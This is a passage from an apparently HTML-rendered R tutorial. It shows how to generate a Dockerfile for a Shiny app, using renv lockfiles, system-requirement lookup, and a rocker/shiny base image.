&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (&lt;span style="color:#ff7b72;font-weight:bold"&gt;!&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;is.null&lt;/span&gt;(sys_reqs&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;error)) rlang&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;abort&lt;/span&gt;(sys_reqs&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;error)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sys_reqs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; purrr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;map&lt;/span&gt;(sys_reqs&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;requirements, purrr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;pluck, &lt;span style="color:#a5d6ff"&gt;&amp;#34;requirements&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;packages&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sys_reqs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sort&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;unique&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;unlist&lt;/span&gt;(sys_reqs)))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sys_reqs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; glue&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue_collapse&lt;/span&gt;(sys_reqs, sep &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34; \\\n &amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; glue&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;RUN apt-get update -qq &amp;amp;&amp;amp; \\ \n&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34; apt-get install -y --no-install-recommends \\\n &amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sys_reqs,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;\ &amp;amp;&amp;amp; \\\n&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34; apt-get clean &amp;amp;&amp;amp; \\ \n&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34; rm -rf /var/lib/apt/lists/*&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .trim &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Trying that out on a vector of packages we get something like&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue_sys_reqs&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;shiny&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;dplyr&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; RUN apt-get update -qq &amp;amp;&amp;amp; \ &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; apt-get install -y --no-install-recommends \&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; make \&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; zlib1g-dev &amp;amp;&amp;amp; \&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; apt-get clean &amp;amp;&amp;amp; \ &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; rm -rf /var/lib/apt/lists/*&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To grab the system requirements for all packages that are used by a
{shiny} app then we could use &lt;code&gt;renv::dependencies()&lt;/code&gt; to scan our code
and list the used packages, then feed then to this function.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;appdir &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;app/&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pkgs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; renv&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;dependencies&lt;/span&gt;(appdir)&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Package
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sys_reqs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue_sys_reqs&lt;/span&gt;(pkgs)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="building-out-the-rest-of-the-dockerfile"&gt;Building out the rest of the Dockerfile&lt;/h2&gt;
&lt;p&gt;In order to reproduce the application that works on our system with a
particular R version and the versions of packages that we have we want
to build a Docker image that has that same version of R and packages.
The rocker project provides a collection of Docker images for different
purposes tagged for different R versions which makes this substantially
easier so it’s really a case of ensuring that we match everything up.&lt;/p&gt;
&lt;p&gt;We can write the line that will give me the rocker/shiny image for my R
version fairly easily&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;(from_shiny_version &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; glue&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;FROM rocker/shiny:{getRversion()}&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; FROM rocker/shiny:4.2.1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and {renv} makes it trivial to snapshot the versions of packages that we
have installed and required for my project.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;appdir &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;app&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;lockfile &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;shiny_renv.lock&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;renv&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;snapshot&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; project &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; appdir,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; lockfile &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; lockfile,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; prompt &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; force &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We then want to get this lock file into the Docker image and
&lt;code&gt;renv::restore()&lt;/code&gt; the state of the library.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;copy_renv &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; glue&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;COPY {lockfile} renv.lock&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;renv_install &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;RUN Rscript -e &amp;#34;install.packages(\&amp;#39;renv\&amp;#39;)&amp;#34;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;renv_restore &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;RUN Rscript -e &amp;#34;renv::restore()&amp;#34;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Finally we want to include the app in the image, let others know on
which port the application is going to communicate (shiny-server
defaults to 3838) and launch the {shiny} server on running the image.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;copy_app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; glue&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;COPY {appdir} /srv/shiny-server/&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;expose &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ifelse&lt;/span&gt;(expose, glue&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;EXPOSE {port}&amp;#34;&lt;/span&gt;), &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cmd &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;CMD [&amp;#34;/usr/bin/shiny-server&amp;#34;]&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Combining all those steps into a single list and writing to file gives
us a final Dockerfile. We can wrap this in a function to make it nicer
to use:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;shiny_write_docker &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; path &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;.&amp;#34;&lt;/span&gt;, appdir &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;app&amp;#34;&lt;/span&gt;, lockfile &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;shiny_renv.lock&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; port &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3838&lt;/span&gt;, expose &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;, rspm &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rspm_env &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ifelse&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rspm,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;ENV RENV_CONFIG_REPOS_OVERRIDE https://packagemanager.rstudio.com/cran/latest\n&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; from_shiny_version &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; glue&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;FROM rocker/shiny:{getRversion()}&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; renv&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;snapshot&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; project &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; path,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; lockfile &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; lockfile,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; prompt &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; force &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pkgs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; renv&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;dependencies&lt;/span&gt;(appdir)&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;Package
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sys_reqs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue_sys_reqs&lt;/span&gt;(pkgs)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; copy_renv &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; glue&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;COPY {lockfile} renv.lock&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; renv_install &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;RUN Rscript -e &amp;#34;install.packages(\&amp;#39;renv\&amp;#39;)&amp;#34;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; renv_restore &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;RUN Rscript -e &amp;#34;renv::restore()&amp;#34;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; copy_app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; glue&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;COPY {appdir} /srv/shiny-server/&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; expose &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ifelse&lt;/span&gt;(expose, glue&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;EXPOSE {port}&amp;#34;&lt;/span&gt;), &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; cmd &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;CMD [&amp;#34;/usr/bin/shiny-server&amp;#34;]&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ret &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; purrr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;compact&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; from_shiny_version,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rspm_env,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sys_reqs,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; copy_renv,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; renv_install,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; renv_restore,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; copy_app,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; expose,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; cmd
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; readr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;write_lines&lt;/span&gt;(ret, file &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;file.path&lt;/span&gt;(path, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Dockerfile&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Taking the old faithful example shiny app template as my app in a
directory called &lt;code&gt;app\&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;shiny_write_docker&lt;/span&gt;(path &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;.&amp;#34;&lt;/span&gt;, appdir &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;app&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; * Lockfile written to &amp;#39;shiny_renv.lock&amp;#39;.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Finding R package dependencies ... Done!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;produces the following Dockerfile&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-dockerfile" data-lang="dockerfile"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;FROM&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;rocker/shiny:4.2.0&lt;/span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;ENV&lt;/span&gt; RENV_CONFIG_REPOS_OVERRIDE https://packagemanager.rstudio.com/cran/latest&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;RUN&lt;/span&gt; apt-get update -qq &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; apt-get install -y --no-install-recommends &lt;span style="color:#79c0ff"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt; make &lt;span style="color:#79c0ff"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt; zlib1g-dev&lt;span style="color:#79c0ff"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; apt-get clean &lt;span style="color:#79c0ff"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; rm -rf /var/lib/apt/lists/*&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;COPY&lt;/span&gt; shiny_renv.lock renv.lock&lt;span style="color:#f85149"&gt;
